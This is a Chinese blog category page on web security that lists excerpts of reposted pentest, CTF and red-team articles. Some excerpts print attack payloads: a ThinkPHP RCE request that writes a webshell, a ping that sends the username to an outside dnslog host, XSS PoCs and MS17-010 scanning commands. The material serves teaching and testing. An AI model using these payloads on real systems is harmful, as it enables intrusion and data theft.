Web安全
文章平均质量分 76
zhangge3663
这个作者很懒,什么都没留下…
展开
-
Package ‘oniguruma’, required by ‘virtual:world’, not found
在编译安装php时有时候会碰到如题所示的错误:Package 'oniguruma', required by 'virtual:world', not found一般在编译php安装时,出现类似的错误只需要安装对应的devel包即可,比如在Centos下,只需要yum install oniguruma-devel就可以解决;然而,yum中没有这个包,需要去第三方找,网上大部分的解决方案是去github下载oniguruma的源码,然后编译安装,而编译时又需要另外一个什么工具,并且还要配置环转载 2021-09-07 09:04:24 · 4147 阅读 · 0 评论 -
Android APK的加固方法
有人的地方就有竞争,在Android的发展过程中就伴随着逆向和安固加固的发展。逆向工作者可以通过一些非常好用的软件,如IDA、JEB等,来加快逆向的速度;应用开发工作者也会通过各种手段来阻止逆向工作者对自己的应用进行逆向。但是往往情况下逆向是不可能做到百分百阻止的,所有只能通过其他的手段来提高自己应用被逆向时的难度,让逆向工作者需要(可不绕过)花费足够多的时间才能把应用逆向成功。在实际情况下,只要不明显影响应用运行速度,我们都可以采用这种思想来进行保护。在这种背景下,膨胀与混淆就应运而生了,这就转载 2021-09-06 12:20:21 · 6084 阅读 · 1 评论 -
python selenium自动化读取cookie、增加cookie、删除cookie
import unittestfrom selenium import webdriverimport timefrom selenium.webdriver.support import expected_conditions as ECfrom selenium.webdriver.support.ui import WebDriverWaitfrom selenium.common.exceptions import TimeoutException, NoAlertPresentExce.转载 2021-07-16 09:55:58 · 747 阅读 · 0 评论 -
ajax请求url 绝对路径与相对路径
1.绝对路径url开头为一个斜杠"/", 这个斜杠说明这个请求从根目录去访问,这个是绝对路径。例子:$.ajax({ url: '/index/list', type: 'json', success: function() { console.log('OK'); }});2.相对路径相对路径就是xiang...转载 2021-06-15 09:49:15 · 1831 阅读 · 0 评论 -
攻防演练中的业务逻辑漏洞及检测思路
随着各类前后端框架的成熟和完善,传统的SQL注入、XSS等常规漏洞在Web系统里逐步减少,而攻击者更倾向于使用业务逻辑漏洞来进行突破。业务逻辑漏洞,具有攻击特征少、自动化cuoruoxzing转载 2021-06-07 14:47:34 · 1289 阅读 · 0 评论 -
API数据安全知多少【知识篇】
一、近年来安全态势近年来,国内外已发生多起由于API 漏洞被恶意攻击或安全管理疏漏导致的数据安全事件,对相关企业和用户权益造成严重损害,逐渐引起各方关注。 分类 年份 公司 详情 国外 2018/2019 Facebook 国外安全人员发现超过2.67 亿条Facebook ID、电话号码和姓名等信息被储存在某公开数据库中。有研究显示,该数据库转载 2021-06-02 10:33:36 · 939 阅读 · 0 评论 -
CTF之一次曲折获取Flag的过程
Hello各位朋友们,我是小杰,今天我们继续CTF之旅。好,直接步入正题,先看看这次的题目描述。通过题目描述,是有一个什么鬼机器人,能和世界进行交流巴拉巴拉......初步确定是需要获取两个Flag,题目的关键字是“枚举”。好的,打开靶标系统~映入眼帘的就是这个CHILL HACK的字样,还有一个“骷髅头”。下边有一处登陆系统的地方。很好,打开我们的“hack”机器——Kali2020。(这里为什么不用忍者系统一会儿说明。)首先确定我们攻击机的IP地址:192..转载 2021-05-31 16:59:13 · 4831 阅读 · 1 评论 -
一个“登录框“引发的安全问题
前言搞安全的小伙伴只有一个登录框你都能测试哪些漏洞?通常大家测试的都会测试关键部分,为了有更好的测试效果,小厂会提供给你用户名密码;但是一些比较重要的企业,而这个环境却是正式环境,里面存放着一些数据不希望被你看到的时候,是不会提供给你登录账号的。这个时候,考研你基础知识是否扎实的时刻来临了。用户名枚举漏洞描述:存在于系统登录页面,利用登录时输入系统存在的用户名错误密码和不存在的用户名错误密码,返回不同的出错信息可枚举出系统中存在的账号信息。测试方法:找到网站或者web系统登转载 2021-05-31 15:27:08 · 3467 阅读 · 0 评论 -
别致的上传思路导致getshell的案例
0x01 前言在某次授权的项目中,客户只要getshell漏洞,经过一番折腾,最后成功拿下shell,完成项目交付,本文将过程和遇到的问题和一些小tips分享给大家。0x02 SQL注入经过资产收集,在资产中,找到某个子域名,打开就是个登录框输入手机号和密码,验证码进行登录,结果数据包中并没有验证码,2333随手加上' 居然报错了,存在mysql的注入,还报错了物理路径,还有密码列名为usepwd(后面有用到)要是root权限是不是就美滋滋了,结果多想了,不是root权限.转载 2021-05-31 12:54:52 · 505 阅读 · 1 评论 -
命令执行无回显的一些姿势
前言最近演练遇到了拿shell后,由于是延时注入,让我极其难受。于是,学习了一下命令执行无回显的一些姿势windows环境1.ping %USERNAME%.2plmqc.dnslog.cn这里的%username%为用户变量附上windows常用变量:%APPDATA% : 列出应用程序数据的默认存放位置。%CD% : 列出当前目录。%CLIENTNAME% : 列出联接到终端服务会话时客户端的NETBIOS名。%CMDCMDLINE% : 列出启动当前转载 2021-05-31 11:43:25 · 3576 阅读 · 1 评论 -
Access-Control-Allow- 设置跨域资源共享CORS详解
跨域访问的项目常在过滤器或者拦截器中添加如下配置:response.setHeader("Access-Control-Allow-Origin", "*");response.setHeader("Access-Control-Allow-Methods", "POST,OPTIONS,GET");response.setHeader("Access-Control-Max-Age", "3600"); response.setHeader("Access-Control-Allow-Hea转载 2021-05-31 11:02:54 · 5218 阅读 · 0 评论 -
XSS:RPO(Relative Path Overwrite)攻击
0x00具体原理参考:Infinite Security: (Relative Path Overwrite) RPO XSSRPO GadgetsRPO攻击0x01RPO攻击首先利用的是通过相对路径引入的CSS,如<link href="styles.css" rel="stylesheet" type="text/css" />当我们在URL最后添加/%0a{}*{background:red;}/的时候会发现页面执行了我们的css代码。通过这点,转载 2021-05-19 08:50:32 · 343 阅读 · 0 评论 -
干货|如何在无回显时渗透
前言在渗透测试的很多时候,我们可能都得不到数据的回显。由于得不到数据的回显,我们就无法进一步判断我们渗透测试的结果。所以本文告诉大家,在没有回显的时候,我们又该如何测试。1.利用pingping `命令`.dnslog有很多免费的dnslog使用,例如BurpSuite自带的模块——Burp Collaborator client,当然社区版没有这个功能,专业版的BurpSuite才具有。 Bur...转载 2021-05-18 11:14:29 · 718 阅读 · 0 评论 -
记一次从代码审计到拿下内网edr的过程
0x01、前言在某次授权红队行动中,客户给定目标外网资产很少经过各种挖掘,各种尝试,久久没有结果,注意到某系统为通用系统。于是开始了下面的故事。0x02、寻找源码到getshell查找源码1、网盘泄露:这套系统并不开源,各种网盘泄露网站一顿查找,无果2、Github、gitlab泄露:尝试了多个关键词,均无果3、Fofa找同类型的站:用favicon.ico,或是用title来搜,并且将这些资产采集起来,最终在某个站发现web.rar,成功获得源码代码审计查看代码转载 2021-05-18 11:13:17 · 273 阅读 · 0 评论 -
干货|红蓝攻防实战演练技术汇总
汇总了前期发布的攻防演练相关的优秀文章,供参加各位同学参考学习。红队红队中易被攻击的一些重点系统漏洞整理2020HVV期间公布漏洞总结红队渗透手册之信息收集篇红队渗透手册之弹药篇攻防演练中红队如何识别蜜罐保护自己干货| 网站渗透总结之Getshell用法大全Linux通过第三方应用提权实战总结提权总结以及各种利用姿势蓝队蓝军经验总结攻防演练总结之数据分析防守方经验总结蓝队经验总结蓝队日志分析技巧蓝军经验总结蓝队防守必须排查的57个安全漏洞与转载 2021-05-18 11:12:21 · 2825 阅读 · 1 评论 -
WAF机制及绕过方法总结:注入篇
本篇文章主要介绍WAF的一些基本原理,总结常见的SQL注入Bypass WAF技巧。WAF是专门为保护基于Web应用程序而设计的,我们研究WAF绕过的目的一是帮助安服人员了解渗透测试中的测试技巧,而是能够对安全设备厂商提供一些安全建议,及时修复WAF存在的安全问题,以增强WAF的完备性和抗攻击性。三是希望网站开发者明白并不是部署了WAF就可以高枕无忧了,要明白漏洞产生的根本原因,最好能在代码层面上就将其修复。一、WAF的定义WAF(Web应用防火墙)是通过执行一系列针对HTTP/HTTPS的安全策略转载 2021-05-18 11:11:53 · 2610 阅读 · 0 评论 -
追洞小组 | Jdbc反序列化漏洞复现浅析
目录1、前言+靶场搭建2、漏洞复现3、漏洞分析4、漏洞修复5、心得前言+靶场搭建很多时候我们获得密码之后进入后台管理的界面,有些上传的漏洞或者sql注入无法getshell,但是如果发现连接mysql服务的数据包中可以传参,那么我们就可以尝试控制链接mysql服务器,反序列化代码来得到shell。所以该漏洞的关键只需要能够控制客户端的jdbc连接,在连接阶段就可以进行触发反序列化。这篇文章也不深入理解mysql的协议。使用idea maven项目创建...转载 2021-05-18 10:37:00 · 1044 阅读 · 1 评论 -
干货|SRC漏洞挖掘经验
先谈个人经历,我虽然很早前就像挖掘SRC来锻炼自己,但真正实现起来大概也是2月初的时候。一开始在几大SRC平台,如顺丰SRC,小米SRC等装了两下,真的不知道从何入手。而且,SRC提交这事从来都是前人吃肉后人喝汤的局面,对于这样的平台,综合考虑自身的实力因素,打算先放弃挖掘这样的SRC。然后我在补天SRC开始挖掘,专属SRC的性质与前者一样,所以我先从公益SRC入手。我是觉得公益SRC对于大佬的吸引力没那么大,对于我等菜鸡可能还能捞点菜汁吃。首个漏洞发现大概在挖掘的第二天发现的,但提交时显示名称已存在,转载 2021-05-18 09:26:53 · 11528 阅读 · 4 评论 -
Pikachu-XXE(xml外部实体注入漏洞)
XXE -"xml external entity injection"既"xml外部实体注入漏洞"。概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题"也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。具体的关于xml实体的介绍,网络上有很多,自己动手先查一下。现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。以PHP为例,在PHP里面转载 2021-05-11 14:22:06 · 374 阅读 · 0 评论 -
Web安全手册(漏洞理解、漏洞利用总结)
0x01 漏洞理解篇(Vulnerability)前端 跨域安全 后端逻辑0x02 漏洞利用篇(Exploit)SQL injection - MySQLXSSCSRFSSRFXXESSTI - Python反序列化漏洞-PHP包含漏洞-PHPNode.js原型链污染DNS rebinding攻击0x03 代码审计篇(Audit) PHP调试环境的搭建 PHP代码审计 0x04 渗透篇(Penetration)网络预置转载 2021-04-23 19:42:47 · 399 阅读 · 0 评论 -
关于JSON CSRF的一些思考
CSRF作为常见漏洞,一直受到关注和研究,JSON是一种应用广泛的轻量级数据交换格式,当CSRF去POST一段JSON,情况可能会变得有些不一样;此次就一种特殊情况下的CSRF进行分析,权当抛砖引玉。某次遇到一个没有验证token与referer的CSRF。其原始数据包为:POST /webnet/edit HTTP/1.1Host: www.xxx.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/201.转载 2021-04-23 16:07:25 · 812 阅读 · 0 评论 -
关于JWT的一些攻击方法
前几天做了一个登录页面的绕过,由于认证返回的token是JWT的格式,于是花了一些时间看了看有关于JWT的东西。#关于JWTJWT的全称为Json Web Token。它遵循JOSN格式,与传统的cookie+session的认证方式不同,服务器使用它的好处是只需要保存秘钥信息,通过加密算法验证token即可,减小了保存用户信息的资源开销。 jwt可以分成三部分,header.payload.signature## header部分通常它会长成这个样子{ "alg": ".转载 2021-04-23 15:46:50 · 1025 阅读 · 0 评论 -
xss漏洞的poc与exp
POC<script>alert('xss')</script> 最简单常用的poc"><script>alert(1)<script><a href=" onclick=alert('xss')>type</a> 页面出现一个按钮type,点击触发onclick,然后执行弹窗。<img src=http://1.1.1.1/a.jpg onerror=alert('xss')> 加载图片,给...转载 2021-04-13 11:19:59 · 1524 阅读 · 0 评论 -
https://mp.weixin.qq.com/s/ilO6DZwRpWdrruKm4J8CMw
近日安全漏洞频发,小编在此收集了近期大家会比较关注的漏洞,做个总结,供大家查漏补缺,若有缺失,欢迎留言补充。目录 一、OA系统二、E-mail三、Web中间件四、源代码管理五、项目管理系统六、开源运维监控七、堡垒机一、OA系统泛微(Weaver-Ecology-OA) 泛微OA E-cology(CNVD-2019-32204)远程命令执行漏洞 a漏洞分析漏洞出现在e-...转载 2021-03-29 15:44:45 · 30057 阅读 · 0 评论 -
HashMap的7种遍历方式
HashMap 遍历大体上可以分为4类:1,迭代器2,ForEach 遍历3,lambda 表达式遍历4,StreamsApi 遍历但是每种类型下有不同的实现方式,所以又可以分为7种:案例demo1,使用迭代器EntrySet的方式遍历@Test//1.使用迭代器EntrySet的方式遍历public void demo1() { //创建Map 对象 Map<Integer, String> map = new HashMap.转载 2021-03-29 15:38:10 · 463 阅读 · 0 评论 -
Netgear R6400v2 堆溢出漏洞分析与利用
2020 年 6 月,ZDI发布了一个关于Netgear R6700型号设备上堆溢出漏洞的安全公告,随后又发布了一篇关于该漏洞的博客,其中对该漏洞进行了详细分析,并给出了完整的漏洞利用代码。该漏洞存在于对应设备的httpd组件中,在处理配置文件上传请求时,由于对请求内容的处理不当,在后续申请内存空间时存在整数溢出问题,从而造成堆溢出问题。攻击者利用这一漏洞可以在目标设备上实现代码执行,且无需认证。此前,关于IoT设备上公开的带完整漏洞利用的堆溢出漏洞比较少(好像公开的堆溢出漏洞就不多...),正好手边有转载 2021-03-29 15:25:02 · 3079 阅读 · 0 评论 -
如何使用Dirsearch探测Web目录
当渗透测试工程师执行网站渗透测试时,第一步应该是找到易受攻击的网站的隐藏目录。这些隐藏的Web目录非常重要,因为它们可以提供一些非常有用的信息,即在面向公众的网站上看不到的潜在攻击媒介。比较快捷的攻击方法之一就是采用暴力猜解网站目录及结构,其中包括网站中的目录、备份文件、编辑器、后台等敏感目录,为此,需要选择一个功能强大的工具。尽管有很多可用的工具来执行站点暴力破解,包括Dirbuster或Dirb,但是它们有其自身的局限性,例如Dirbuster仅提供时钟不可行的GUI界面,并且Dirb不包括转载 2021-03-29 14:51:08 · 1341 阅读 · 0 评论 -
apache日志 waf_WAF对WebShell流量检测的性能分析
最近在一次授权渗透测试中遇到了一个棘手的场景,万能的队友已经找到了后台上传点,并传了小马然后开心地用antsword进行连接,但是由于明文传输很快被waf感知,并引起了管理员的注意,很快我们的马被清了,真是偷鸡不成蚀把米。痛定思痛,我们判断对方并不能尽快修复漏洞,于是临阵抱佛脚,希望于通过加密算法提高攻击的质量。首先要做三件事第一,迅速在本地复现对方环境,第二,配置多种加密组合成攻击载荷,第三,用开源安全模块modsecurity测试攻击载荷加密后的效果。本地环境组建从保留的截图来看,对方的转载 2021-03-11 10:55:35 · 421 阅读 · 0 评论 -
对某钓鱼网站的一次渗透测试
周末在某个CTF群偶然看到这个钓鱼网站:http://gggggg.cn(声明:本文中出现的域名、IP均被替换,并非真实存在,请勿测试),于是开始对该网站进行渗透。观察网站页面,可知这个网站应该是用来盗取QQ账号的。除了域名没有一点迷惑性,网站页面做的还行。如果用户不注意,点击了 立即申请取消,就会弹出一个登陆框。一旦用户输入QQ账号密码,后台就会立刻记录到数据库中。先用dirsearch扫一下目录文件,并查看是否有可利用的功能点。同时通过页面源码、网站提供的功能,找到如下几个接口.转载 2021-03-10 13:26:27 · 1056 阅读 · 2 评论 -
干货|对某杀猪盘的渗透测试
最近偶然发现一个虚拟货币买涨跌的杀猪盘,遂进行了一波测试,前台长这样。为thinkphp5.0.5随用RCE进行打入,成功写入webshell。s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@file_put_contents(base64_decode(MTIzNDUucGhw),base64_decode(MMTI8P3BocCBldmF转载 2021-03-10 12:00:38 · 1043 阅读 · 4 评论 -
实战绕过宝塔PHP disable_function 限制getshell
一、这次做的目标站点是一个某XX站点,通过前期的信息收集,可以发现该站点是由宝塔(一般根服务器开放端口888、8888和报错界面判定)+ShuipfCMS框架搭建的端口信息后台二、默认的ShuipfCMS系统后台访问http://www.xxx.com/admin/会自动跳转到后台,但是这个站点感觉是被二次开发过的,站点后台和前端页面不在同一个子域名下,该后台还是通过收集子域名得到的,访问某xxx.xxx.com会自动跳转到后台登录页面。三、这里想着尝试绕过验证码来对后台用户名密码进转载 2021-03-09 17:45:02 · 3805 阅读 · 0 评论 -
某公司邮件系统的安全检测
目前分析1、地址:https://mail.*****com/coremail/分析:登录功能和忘记密码功能;目前站点是邮箱系统。方向:爆破、逻辑漏洞-密码找回信息收集1、google通过域名收集相关网站获取邮箱信息,inur:***2.经过多个邮箱信息收集,发现邮箱命名规则密码找回输入获取到的邮箱,点击获取邮箱的手机号码,并进行 抓放返回绑定的手机号码,信息泄露,如果失败时返回错误的在点击 【获取短信内容】,发现有个**code的内容,四位数,.转载 2021-02-20 11:46:12 · 1998 阅读 · 0 评论 -
记一次某APK的恶意WIFI攻击
用户接入恶意WIFI即打开某APP,泄露用户cookie,攻击者可以通过token获取用户手机号、收藏、收货地址等漏洞详情查看manifest.xml有如下deeplink activity"com.xxxx.client.android.modules.deeplink.ParseDeepLinkActivity" android:noHistory="true" android:theme="@style/Transparent" android:windowSoftInputMode="转载 2021-02-20 11:39:39 · 5138 阅读 · 0 评论 -
Linux通过第三方应用提权实战总结
Linux提权,前提是拿到了一个低权限的账号,能上传和下载文件,主要思路有:1、内核提权。网上各种大佬的payload很多,关键在于要能找到利用哪个exp以及具体如何利用。省力点的方法是用searchsploit或者linux-exploit-suggester.sh来查找,熟悉之后难度也不大。2、suid提权。这里也包含了sudo这种方式,两种方法的思路都是一样的,区别在于suid针对单个程序,sudo针对某个用户。这类提权方式的主要思路是:管理员授权普通用户去执行 root 权限的操作,而不需要转载 2021-02-20 11:19:58 · 1562 阅读 · 0 评论 -
某大学多站联动获取webshell
0x00前言前面大体概括一下获取webshell的一个思路,此服务器存在是哪个系统,利用第一个系统获取到了老师以及学生的学号,其他的没有什么价值的信息,虽然存在文件上传,但是上传的文件目录不是在web目录底下的,后来通过连接了webshell也证实了这一点,利用手机到的老师以及学生信息,成功登录了第二个系统,第二个系统学生登录后处存在上传,但是没有路径,并且不能访问到上传的文件,老师登录可以下载到学生上传的文件,通过抓包可以枚举所有目录以及文件,后来通过枚举发现此处的上传点也不在网站根目录下,然后回到学转载 2021-02-20 10:36:52 · 131 阅读 · 0 评论 -
Web渗透测试学习路线图
Web安全相关概念熟悉基本概念(SQL注入、上传、XSS、CSRF、一句话木马等)。通过关键字(SQL注入、上传、XSS、CSRF、一句话木马等)进行Google/SecWiki;阅读《精通脚本黑客》,虽然很久也有错误,但是入门还是可以的;看一些渗透笔记/视频,了解渗透实战的整个过程,可以Google(渗透笔记、渗透过程、入侵过程等);熟悉渗透相关工具熟悉AWVS、sqlmap、Burp、nessus、chopper、nmap、Appscan等相关工具的使用。了解该类工具的.转载 2021-02-19 09:31:29 · 650 阅读 · 0 评论 -
代码审计XSS 0day
个人技术能力问题,先从xss挖!步骤一:使用rips进行自动化审计感觉这个好搞步骤二:使用vscode看Rips提示57行有洞复制出来看:echo '<div id="douFrame"><div class="bg" onclick="douRemove('."'douFrame'".')"></div><div class="frame details"><h2><a href="javascript:v转载 2021-02-18 15:22:55 · 185 阅读 · 0 评论 -
实战|对某棋牌站的一次getshell
起因最近在fofa翻目标C段的时候,碰巧看到了这个站便记了下来,等下班回家后直接拿下。目标环境信息BC类的活动页很多都是thinkphp二改的站,我们主要确定当前tp的版本号。http://www.abc.com/index.php?s=1目标环境信息Windows ThinkPHP v.3.2.3 开启Debug模式 网站绝对路径 D:\web1\abc.com\wwlsoeprsueords\用工具扫描日志文件tp3注入漏洞不存在,日志文件在/addo转载 2021-02-18 13:08:21 · 1260 阅读 · 3 评论 -
实战|渗透学校某内网服务器
”黑“掉自己的学校,可能是大多数黑阔们学生时代共同的执念。前言:心血来潮,突然想看看学校有没有能用永恒之蓝打下来的机器,顺便来一波内网渗透,想想上一次测试还是刚爆出永恒之蓝的利用工具的时候,那时候msf都还没整合进去,现在直接就能用msf方便多了。信息收集:已知 10.10.10.0/24 为学校各种服务器使用的IP使用MSF中的批量ms17_010验证模块:msf5 > use auxiliary/scanner/smb/smb_ms17_010 msf5 auxili.转载 2021-02-01 13:59:18 · 4863 阅读 · 2 评论 -
python编译后的pyd爆破
最近接触一个国外某app的协议软件,是python3.8写的,它把关键模块都编译成了pyd,然后使用pyinstaller打包发布给用户。软件启动后检查机器码,然后就需要输入授权码才可使用,看着很是恼火,所以想尝试破解。其中关键应该是需要爆破pyd里的逻辑,修改汇编代码来实现绕过授权。1. py、pyc、pyo、pydpy: python 脚本文件(source code)pyc:脚本文件编译得到的字节码,二进制文件,python文件经过编译器编译之后的文件。可以提高文件加载速度。..转载 2021-02-01 12:58:10 · 2666 阅读 · 2 评论